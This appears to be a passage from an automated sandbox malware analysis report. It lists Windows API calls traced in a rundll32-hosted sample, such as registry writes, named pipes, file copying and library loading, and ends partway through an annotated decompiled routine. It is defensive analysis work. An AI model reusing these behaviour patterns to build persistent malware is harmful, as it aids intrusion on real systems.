                                                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 05578E67
                                                          • wsprintfA.USER32 ref: 05578E82
                                                          • lstrlen.KERNEL32(00000000,00000000), ref: 05578E8D
                                                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 05578EA4
                                                          • HeapFree.KERNEL32(00000000,?,?,?,00000008,0000000B,?,?,?,00000001,00000000,?,00000001,055963D8,00000002,?), ref: 05578EC6
                                                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 05578EE1
                                                          • wsprintfA.USER32 ref: 05578EF8
                                                          • lstrlen.KERNEL32(00000000,00000000), ref: 05578F03
                                                            • Part of subcall function 05581486: lstrlen.KERNEL32(?,00000000,00000000,75145520,?,?,?,0557D50C,0000001C,00000000,00000000), ref: 055814B6
                                                            • Part of subcall function 05581486: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 055814CC
                                                            • Part of subcall function 05581486: memcpy.NTDLL(00000010,?,00000000,?,?,?,0557D50C,0000001C), ref: 05581502
                                                            • Part of subcall function 05581486: memcpy.NTDLL(00000010,00000000,0557D50C,?,?,?,0557D50C), ref: 0558151D
                                                            • Part of subcall function 05581486: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 0558153B
                                                            • Part of subcall function 05581486: GetLastError.KERNEL32(?,?,?,0557D50C), ref: 05581545
                                                            • Part of subcall function 05581486: HeapFree.KERNEL32(00000000,00000000,?,?,?,0557D50C), ref: 05581568
                                                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 05578F1A
                                                          • HeapFree.KERNEL32(00000000,?,?,00000001,00000000,?,00000001,055963D8,00000002,?,?), ref: 05578F2A
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$Free$Allocate$lstrlen$QueryValuememcpywsprintf$CallCloseErrorLastNamedPipe
                                                          • String ID:
                                                          • API String ID: 3733591251-0

                                                          APIs
                                                          • StrChrA.SHLWAPI(?,0000002C), ref: 05571875
                                                          • StrTrimA.SHLWAPI(00000001,?), ref: 0557188E
                                                          • StrChrA.SHLWAPI(?,0000002C), ref: 05571899
                                                          • StrTrimA.SHLWAPI(00000001,?), ref: 055718B2
                                                          • lstrlen.KERNEL32(?,?,00000001,?,?), ref: 05571955
                                                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 05571977
                                                          • lstrcpy.KERNEL32(00000020,?), ref: 05571996
                                                          • lstrlen.KERNEL32(?), ref: 055719A0
                                                          • memcpy.NTDLL(?,?,?), ref: 055719E1
                                                          • memcpy.NTDLL(?,?,?), ref: 055719F4
                                                          • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 05571A18
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 05571A3A
                                                          • HeapFree.KERNEL32(00000000,?,?,00000001,?,?), ref: 05571A60
                                                          • HeapFree.KERNEL32(00000000,00000001,?,00000001,?,?), ref: 05571A7C
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
                                                          • String ID:
                                                          • API String ID: 3323474148-0

                                                          APIs
                                                          • lstrlen.KERNEL32(?,?,00000000), ref: 0557F26B
                                                          • lstrlen.KERNEL32(?,?,00000000), ref: 0557F272
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0557F289
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 0557F29A
                                                          • lstrcat.KERNEL32(?,?), ref: 0557F2B6
                                                          • lstrcat.KERNEL32(?,?), ref: 0557F2C7
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0557F2D8
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0557F375
                                                          • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,00000000), ref: 0557F3AE
                                                          • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 0557F3C7
                                                          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 0557F3D1
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 0557F3E1
                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0557F3FA
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 0557F40A
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
                                                          • String ID:
                                                          • API String ID: 333890978-0

                                                          APIs
                                                          • wsprintfA.USER32 ref: 05586194
                                                          • OpenWaitableTimerA.KERNEL32(00100000,00000000,0557AA7A), ref: 055861A7
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,0557AA7A,00000000,?), ref: 055862BF
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • memset.NTDLL ref: 055861CA
                                                          • memcpy.NTDLL(?,000493E0,00000010,?,?,00000040,?,?,?,?,?,?,0557AA7A,00000000,?), ref: 05586249
                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 0558625E
                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 05586276
                                                          • GetLastError.KERNEL32(05590D24,?,?,?,?,?,?,?,00000040,?,?,?,?,?,?,0557AA7A), ref: 0558628E
                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 0558629A
                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 055862A9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterLeave$AllocateCloseErrorHandleHeapLastOpenTimerWaitablememcpymemsetwsprintf
                                                          • String ID: 0x%08X$W
                                                          • API String ID: 1559661116-2600449260

                                                          APIs
                                                          • lstrlenW.KERNEL32(?,00000000,?,?,?,055815F2,?,?), ref: 055789AC
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,055815F2,?,?), ref: 055789D5
                                                          • lstrcpyW.KERNEL32(-0000FFFE,?), ref: 055789F5
                                                          • lstrcpyW.KERNEL32(-00000002,?), ref: 05578A10
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,055815F2,?,?), ref: 05578A1C
                                                          • LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,055815F2,?,?), ref: 05578A1F
                                                          • SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,055815F2,?,?), ref: 05578A2B
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 05578A48
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 05578A62
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 05578A78
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 05578A8E
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 05578AA4
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 05578ABA
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,055815F2,?,?), ref: 05578AE3
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
                                                          • String ID:
                                                          • API String ID: 3772355505-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(?,?,00000000,?,?,?,05582804,?,?,?), ref: 05586B07
• lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,05582804,?,?,?), ref: 05586B12
• lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,05582804,?,?,?), ref: 05586B1A
• RtlAllocateHeap.NTDLL(00000000,?), ref: 05586B2F
• lstrcpyW.KERNEL32(00000000,?), ref: 05586B40
• lstrcatW.KERNEL32(00000000,?), ref: 05586B52
• CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,05582804,?,?,?), ref: 05586B57
• lstrcatW.KERNEL32(00000000,055963D0), ref: 05586B63
• lstrcatW.KERNEL32(00000000), ref: 05586B6B
• CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,05582804,?,?,?), ref: 05586B70
• lstrcatW.KERNEL32(00000000,055963D0), ref: 05586B7C
• lstrcatW.KERNEL32(00000000,00000002), ref: 05586B97
• CopyFileW.KERNEL32(?,00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,05582804,?,?,?), ref: 05586B9F
• HeapFree.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,05582804,?,?,?), ref: 05586BAD
Memory Dump Source
• Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
Similarity
• API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
• String ID:
• API String ID: 3635185113-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0558A442: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 0558A487
  • Part of subcall function 0558A442: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 0558A49F
  • Part of subcall function 0558A442: WaitForSingleObject.KERNEL32(00000000,?,00000000,?,?,?,?,?,05572EFF,0557B352,?,00000001), ref: 0558A567
  • Part of subcall function 0558A442: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,05572EFF,0557B352,?,00000001), ref: 0558A590
  • Part of subcall function 0558A442: HeapFree.KERNEL32(00000000,05572EFF,?,00000000,?,?,?,?,?,05572EFF,0557B352,?,00000001), ref: 0558A5A0
  • Part of subcall function 0558A442: RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,05572EFF,0557B352,?,00000001), ref: 0558A5A9
• lstrcmp.KERNEL32(?,?), ref: 05572F4D
• HeapFree.KERNEL32(00000000,?), ref: 05572F79
• GetCurrentThreadId.KERNEL32 ref: 0557302A
• GetCurrentThread.KERNEL32 ref: 0557303B
• HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,0557B352,?,00000001), ref: 05573078
• HeapFree.KERNEL32(00000000,?,?,?,00000000,?,0557B352,?,00000001), ref: 0557308C
• RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 0557309A
• wsprintfA.USER32 ref: 055730B2
  • Part of subcall function 05589E0B: lstrlen.KERNEL32(00000000,00000000,00000000,00000008,05576149,00000000,00000000,00000000,75145520,00000000,?,0557D44F,00000020,00000000,?,00000000), ref: 05589E15
  • Part of subcall function 05589E0B: lstrcpy.KERNEL32(00000000,00000000), ref: 05589E39
  • Part of subcall function 05589E0B: StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00000003,?,0557D44F,00000020,00000000,?,00000000,?,00000000,00000000), ref: 05589E40
  • Part of subcall function 05589E0B: lstrcat.KERNEL32(00000000,?), ref: 05589E97
• lstrlen.KERNEL32(00000000,00000000), ref: 055730BD
• HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 055730D4
• HeapFree.KERNEL32(00000000,00000000), ref: 055730E5
• HeapFree.KERNEL32(00000000,?), ref: 055730F1
Memory Dump Source
• Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
Similarity
• API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
• String ID:
• API String ID: 773763258-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 0557A8C8
• memcpy.NTDLL(?,?,00000010), ref: 0557A8EB
• memset.NTDLL ref: 0557A937
• lstrcpyn.KERNEL32(?,?,00000034), ref: 0557A94B
• GetLastError.KERNEL32 ref: 0557A979
• GetLastError.KERNEL32 ref: 0557A9C0
• GetLastError.KERNEL32 ref: 0557A9DF
• WaitForSingleObject.KERNEL32(?,000927C0), ref: 0557AA19
• WaitForSingleObject.KERNEL32(?,00000000), ref: 0557AA27
• GetLastError.KERNEL32 ref: 0557AAA1
• ReleaseMutex.KERNEL32(?), ref: 0557AAB3
• RtlExitUserThread.NTDLL(?), ref: 0557AAC9
Memory Dump Source
• Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
Similarity
• API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
• String ID:
• API String ID: 4037736292-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• lstrlen.KERNEL32(00000000), ref: 05572348
• lstrlen.KERNEL32(?), ref: 05572350
• RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05572360
• lstrcpy.KERNEL32(00000000,?), ref: 0557237F
• lstrlen.KERNEL32(?), ref: 05572394
• lstrlen.KERNEL32(?), ref: 055723A2
• HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 055723F0
• lstrlen.KERNEL32(?,00000000,?,?,?,?,?,00000000,?,?,?,?), ref: 05572414
• lstrlen.KERNEL32(?), ref: 05572447
• HeapFree.KERNEL32(00000000,?,?), ref: 05572472
• HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,?,00000000,?,?,?,?), ref: 05572489
• HeapFree.KERNEL32(00000000,?,?), ref: 05572496
Memory Dump Source
• Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
Similarity
• API ID: lstrlen$Heap$Free$Allocatelstrcpy
• String ID:
• API String ID: 904523553-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 055930E8
• WaitForSingleObject.KERNEL32(000002DC,00000000), ref: 0559310A
• ConnectNamedPipe.KERNEL32(?,?), ref: 0559312A
• GetLastError.KERNEL32 ref: 05593134
• WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 05593158
• FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,00000010,00000000), ref: 0559319B
• DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 055931A4
• WaitForSingleObject.KERNEL32(00000000), ref: 055931AD
• CloseHandle.KERNEL32(?), ref: 055931C2
• GetLastError.KERNEL32 ref: 055931CF
• CloseHandle.KERNEL32(?), ref: 055931DC
• RtlExitUserThread.NTDLL(000000FF), ref: 055931F2
Memory Dump Source
• Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
Similarity
• API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
• String ID:
• API String ID: 4053378866-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RtlImageNtHeader.NTDLL(?), ref: 05571F88
• GetTempPathA.KERNEL32(00000000,00000000,?,?,05579EC5,00000000,00000094,00000000,?), ref: 05571FA0
• RtlAllocateHeap.NTDLL(00000000,00000011), ref: 05571FAF
• GetTempPathA.KERNEL32(00000001,00000000,?,?,05579EC5,00000000,00000094,00000000,?), ref: 05571FC2
• GetTickCount.KERNEL32 ref: 05571FC6
• wsprintfA.USER32 ref: 05571FDD
• RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 05572018
• StrRChrA.SHLWAPI(00000000,00000000,?), ref: 05572035
• lstrlen.KERNEL32(00000000), ref: 0557203F
• RegSetValueExA.ADVAPI32(00000001,00000001,00000000,00000001,00000000,00000001), ref: 0557204F
• RegCloseKey.ADVAPI32(?), ref: 0557205B
• HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000001,00000000,?), ref: 05572069
Memory Dump Source
• Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
Similarity
• API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTickValuelstrlenwsprintf
• String ID:
• API String ID: 3778301466-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RtlImageNtHeader.NTDLL(00000000), ref: 0557D3DE
• GetCurrentThreadId.KERNEL32 ref: 0557D3F4
• GetCurrentThread.KERNEL32 ref: 0557D405
  • Part of subcall function 055919DC: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,75145520,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 055919EE
  • Part of subcall function 055919DC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A07
  • Part of subcall function 055919DC: GetCurrentThreadId.KERNEL32 ref: 05591A14
  • Part of subcall function 055919DC: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A20
  • Part of subcall function 055919DC: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A2E
  • Part of subcall function 055919DC: lstrcpy.KERNEL32(00000000), ref: 05591A50
  • Part of subcall function 0557612D: lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,00000000,75145520,00000000,?,0557D44F,00000020,00000000,?,00000000), ref: 05576198
  • Part of subcall function 0557612D: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000001,00000000,00000000,75145520,00000000,?,0557D44F,00000020,00000000,?,00000000), ref: 055761C0
• HeapFree.KERNEL32(00000000,?,?,?,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 0557D47F
• HeapFree.KERNEL32(00000000,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 0557D48B
• RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 0557D4DA
• wsprintfA.USER32 ref: 0557D4F2
• lstrlen.KERNEL32(00000000,00000000), ref: 0557D4FD
• HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 0557D514
Memory Dump Source
• Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
Similarity
• API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
• String ID: W
• API String ID: 630447368-655174618
Uniqueness
• Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(?,7519F560,00000000,00000000), ref: 055926A5
• TlsAlloc.KERNEL32 ref: 055926AF
• LoadLibraryA.KERNEL32(?), ref: 055926D8
• LoadLibraryA.KERNEL32(?), ref: 055926E6
• LoadLibraryA.KERNEL32(?), ref: 055926F4
• LoadLibraryA.KERNEL32(?), ref: 05592702
• LoadLibraryA.KERNEL32(?), ref: 05592710
• LoadLibraryA.KERNEL32(?), ref: 0559271E
• HeapFree.KERNEL32(00000000,?), ref: 055927C9
Memory Dump Source
• Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
Similarity
• API ID: LibraryLoad$AllocFreeHeap
• String ID: ~
• API String ID: 356845663-1707062198
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 05585A38
  • Part of subcall function 05580110: RegCloseKey.ADVAPI32(?,?,?,05579B89,00000000,00000000,00000000), ref: 05580197
• RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 05585A73
• lstrcpyW.KERNEL32(-00000002,?), ref: 05585AD4
• lstrcatW.KERNEL32(00000000,?), ref: 05585AE9
• lstrcpyW.KERNEL32(?), ref: 05585B03
• lstrcatW.KERNEL32(00000000,?), ref: 05585B12
  • Part of subcall function 05588C8E: lstrlenW.KERNEL32(?,?,?,05577DC5,?,?,?,?,00001000,?,?,00001000), ref: 05588CA1
  • Part of subcall function 05588C8E: lstrlen.KERNEL32(?,?,05577DC5,?,?,?,?,00001000,?,?,00001000), ref: 05588CAC
  • Part of subcall function 05588C8E: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 05588CC1
• RegCloseKey.ADVAPI32(?,?,?,00000000,?), ref: 05585B7C
  • Part of subcall function 0557B585: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,05579C46,?), ref: 0557B591
  • Part of subcall function 0557B585: memcpy.NTDLL(00000000,00000000,00000000,00000002,?,?,05579C46,?), ref: 0557B5B9
  • Part of subcall function 0557B585: memset.NTDLL ref: 0557B5CB
• CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,00000000,00000000,?), ref: 05585BB1
• GetLastError.KERNEL32 ref: 05585BBC
• HeapFree.KERNEL32(00000000,00000000), ref: 05585BD2
• RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,?), ref: 05585BE4
Memory Dump Source
• Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
Similarity
• API ID: Closelstrlen$HeapOpenlstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
• String ID:
• API String ID: 1430934453-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 0558A2C1
• RtlAllocateHeap.NTDLL(00000000,00000104), ref: 0558A2D6
• RegCreateKeyA.ADVAPI32(80000001,?), ref: 0558A2FE
• HeapFree.KERNEL32(00000000,?,?,?,?,?,055723D9,00000000,?), ref: 0558A33F
• HeapFree.KERNEL32(00000000,?,?,?,?,?,055723D9,00000000,?), ref: 0558A34F
• RtlAllocateHeap.NTDLL(00000000,?), ref: 0558A362
• RtlAllocateHeap.NTDLL(00000000,?), ref: 0558A371
• HeapFree.KERNEL32(00000000,?,?,?,?,?,055723D9,?,?,?,?,?,055723D9,00000000,?), ref: 0558A3BB
• RegCloseKey.ADVAPI32(?,?,?,?,?,055723D9,00000000,?,?,?,?), ref: 0558A3DF
• HeapFree.KERNEL32(00000000,?,?,?,?,?,055723D9,00000000,?,?,?,?), ref: 0558A404
• HeapFree.KERNEL32(00000000,?,?,?,?,?,055723D9,00000000,?,?,?,?), ref: 0558A419
Memory Dump Source
• Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
Similarity
• API ID: Heap$Free$Allocate$CloseCreate
• String ID:
• API String ID: 4126010716-0
                                                          • Opcode ID: 47b0e9154d691be1fa90b6008f2e6b582c83f1eec9fefd905e3f57d8d23247f7
                                                          • Instruction ID: db363ff9ebccf3eec9f7d169ccdb67d7113552bf4b9d41368e6aafc728538c6b
                                                          • Opcode Fuzzy Hash: 47b0e9154d691be1fa90b6008f2e6b582c83f1eec9fefd905e3f57d8d23247f7
                                                          • Instruction Fuzzy Hash: 6F51F2B1C10109EFDF01DF95D9858EEBFB9FB08364B11402AF515B2220DB359A99EF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • PathFindFileNameW.SHLWAPI(?), ref: 05583D21
                                                          • PathFindFileNameW.SHLWAPI(?), ref: 05583D37
                                                          • lstrlenW.KERNEL32(00000000), ref: 05583D7A
                                                          • RtlAllocateHeap.NTDLL(00000000,05594AA4), ref: 05583D90
                                                          • memcpy.NTDLL(00000000,00000000,05594AA2), ref: 05583DA3
                                                          • _wcsupr.NTDLL ref: 05583DAE
                                                          • lstrlenW.KERNEL32(?,05594AA2), ref: 05583DE7
                                                          • RtlAllocateHeap.NTDLL(00000000,?,05594AA2), ref: 05583DFC
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 05583E12
                                                          • lstrcatW.KERNEL32(00000000,?), ref: 05583E37
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 05583E46
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocateFileFindNamePathlstrlen$Free_wcsuprlstrcatlstrcpymemcpy
                                                          • String ID:
                                                          • API String ID: 3868788785-0
                                                          • Opcode ID: 4fe351d11da193e2342093c62447282e36e0785e7033489d095af9ec65bd1b8d
                                                          • Instruction ID: ba83792b654c62057687f1c82de82b15cf8cf60fe166cb3ae4f6eaf249092a86
                                                          • Opcode Fuzzy Hash: 4fe351d11da193e2342093c62447282e36e0785e7033489d095af9ec65bd1b8d
                                                          • Instruction Fuzzy Hash: AF312C32514215EBD7206F64EC8993F7FA9FB49B60F170E1AF512E3141DF78A8489B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 43%
                                                          // Decompiler output (Joe Sandbox IDA plugin). The E00E5xxxx helpers are unresolved internal
                                                          // routines of the sample. The comments below were added during editing and state only what
                                                          // this listing and its API list show: the routine builds two wide strings from format
                                                          // templates in the data section and returns 0 on success, 8 on any failure.
                                                          			E00E56414(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _v12;
                                                          				long _v16;
                                                          				WCHAR* _v20;
                                                          				signed int _v24;
                                                          				void* __esi;
                                                          				long _t43;
                                                          				intOrPtr _t44;
                                                          				intOrPtr _t46;
                                                          				void* _t48;
                                                          				void* _t49;
                                                          				void* _t50;
                                                          				WCHAR* _t54;
                                                          				intOrPtr _t57;
                                                          				void* _t58;
                                                          				void* _t59;
                                                          				void* _t60;
                                                          				intOrPtr _t66;
                                                          				void* _t71;
                                                          				void* _t74;
                                                          				intOrPtr _t75;
                                                          				void* _t77;
                                                          				intOrPtr _t79;
                                                          				intOrPtr* _t80;
                                                          				WCHAR* _t91;
                                                          
                                                          				_t79 =  *0xe5a38c; // 0x51b9bd8
                                                          				_v24 = 8; // result code: stays 8 unless both output strings are built (cleared to 0 below)
                                                          				_t43 = GetTickCount(); // tick count is the seed handed to E00E52292 via &_v16
                                                          				_push(5);
                                                          				_t74 = 0xa;
                                                          				_v16 = _t43;
                                                          				_t44 = E00E52292(_t74,  &_v16);
                                                          				_v8 = _t44;
                                                          				if(_t44 == 0) {
                                                          					_v8 = 0xe591ac; // fallback: fixed string in the data section
                                                          				}
                                                          				_t46 = E00E516F4(_t79);
                                                          				_v12 = _t46;
                                                          				if(_t46 != 0) {
                                                          					// unresolved import; the API list for this function shows lstrlen.KERNEL32 at
                                                          					// 00E56469, 00E56472 and 00E56479, so *_t80 is lstrlen
                                                          					_t80 = __imp__;
                                                          					_t48 =  *_t80(_v8, _t71);
                                                          					_t49 =  *_t80(_v12);
                                                          					_t50 =  *_t80(_a4);
                                                          					// byte size of a wide string: the repeated terms are 2 * (lstrlenW(_a8) + len(_v8)*2
                                                          					// + len(_v12) + len(_a4)) plus 0x102 of slack; _v8 is counted twice because the
                                                          					// wsprintfW call below passes it twice
                                                          					_t54 = E00E55FBC(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                                          					_v20 = _t54;
                                                          					if(_t54 != 0) {
                                                          						_t75 =  *0xe5a2d4; // 0x435d5a8
                                                          						_t16 = _t75 + 0xe5bab8; // 0x530025  (format template in the data section)
                                                          						wsprintfW(_t54, _t16, _v8, _v8, _a4, _v12, _a8); // first output string
                                                          						_push(4);
                                                          						_t77 = 5;
                                                          						_t57 = E00E52292(_t77,  &_v16); // second call with a different count/argument
                                                          						_v8 = _t57;
                                                          						if(_t57 == 0) {
                                                          							_v8 = 0xe591b0; // fallback string for the second template
                                                          						}
                                                          						_t58 =  *_t80(_v8);
                                                          						_t59 =  *_t80(_v12);
                                                          						_t60 =  *_t80(_a4);
                                                          						// same sizing scheme as above, now keyed on _a12, with 0x13a of slack
